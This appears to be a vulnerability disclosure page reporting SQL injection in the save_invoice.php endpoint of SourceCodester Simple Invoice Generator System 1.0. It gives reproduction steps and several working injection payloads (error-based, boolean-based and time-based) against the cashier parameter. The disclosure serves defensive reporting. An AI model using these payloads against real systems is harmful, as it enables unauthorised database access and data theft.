ଜମା କରନ୍ତୁ #403629: SourceCodester Simple Invoice Generator System 1.0 SQL Injectionସୂଚନା

ଶୀର୍ଷକ	SourceCodester Simple Invoice Generator System 1.0 SQL Injection
ବର୍ଣ୍ଣନା	I would like to report a SQL injection vulnerability I discovered in the sourcecodester of the Simple Invoice Generator System during my testing. Details: Affected URL/Endpoint: /php-invoice/save_invoice.php Vulnerable Parameter: 'invoice_code', 'customer', 'cashier', 'total_amount', 'discount_percentage', 'discount_amount', 'tendered_amount' Risk Level: High (allows malicious users to execute arbitrary SQL queries) Steps to reproduce: 1) Sign in as any cashier. 2) Fill up the form and "Add Item". 3) Cilck "Save & Generate Printable Invoice" 2) Use a proxy like burpsuite to intercept the "save_invoice" request. 3) Input the payload to invoke the SQL injection. --- cashier=Cashier+1%27+OR+GTID_SUBSET%28CONCAT%280x717a716a71%2C%28MID%28%28IFNULL%28CAST%28VERSION%28%29+AS+NCHAR%29%2C0x20%29%29%2C1%2C190%29%29%2C0x7162786a71%29%2C8744%29--+BhDR&total_amount=12&discount_amount=0&invoice_code=test&customer=test&qty%5B%5D=1&item%5B%5D=test&unit%5B%5D=pcs&price%5B%5D=12&total%5B%5D=12&discount_percentage=0&tendered_amount=0 --- 4) It is also vulnerable to the following attackes after running sqlmap on it. --- Parameter: cashier (POST) Type: boolean-based blind Title: MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE) Payload: cashier=Cashier 1' AND EXTRACTVALUE(9612,CASE WHEN (9612=9612) THEN 9612 ELSE 0x3A END)-- rTeI&total_amount=12&discount_amount=0&invoice_code=test&customer=test&qty[]=1&item[]=test&unit[]=pcs&price[]=12&total[]=12&discount_percentage=0&tendered_amount=0 Type: error-based Title: MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET) Payload: cashier=Cashier 1' OR GTID_SUBSET(CONCAT(0x717a716a71,(SELECT (ELT(6679=6679,1))),0x7162786a71),6679)-- laEK&total_amount=12&discount_amount=0&invoice_code=test&customer=test&qty[]=1&item[]=test&unit[]=pcs&price[]=12&total[]=12&discount_percentage=0&tendered_amount=0 Type: time-based blind Title: MySQL >= 5.0.12 OR time-based blind (query SLEEP) Payload: cashier=Cashier 1' OR (SELECT 7314 FROM (SELECT(SLEEP(5)))EMDB)-- ndpB&total_amount=12&discount_amount=0&invoice_code=test&customer=test&qty[]=1&item[]=test&unit[]=pcs&price[]=12&total[]=12&discount_percentage=0&tendered_amount=0 --- Please let me know if you need further information or a more detailed analysis.
ଉପଭୋକ୍ତା	Delvy (UID 74555)
ଦାଖଲ	09/06/2024 10:49 AM (1 ବର୍ଷ ago)
ମଧ୍ୟମ ଧରଣର	09/06/2024 11:32 PM (13 hours later)
ସ୍ଥିତି	ଗ୍ରହଣ କରାଯାଇଛି
VulDB ଏଣ୍ଟ୍ରି	276780 [SourceCodester Simple Invoice Generator System 1.0 /save_invoice.php SQL ଇଞ୍ଜେକ୍ସନ]
ପଏଣ୍ଟ	17

◂ ପଛକୁ ସମୀକ୍ଷା ଆହୁରି ଦୂରରେ ▸

Interested in the pricing of exploits?

See the underground prices here!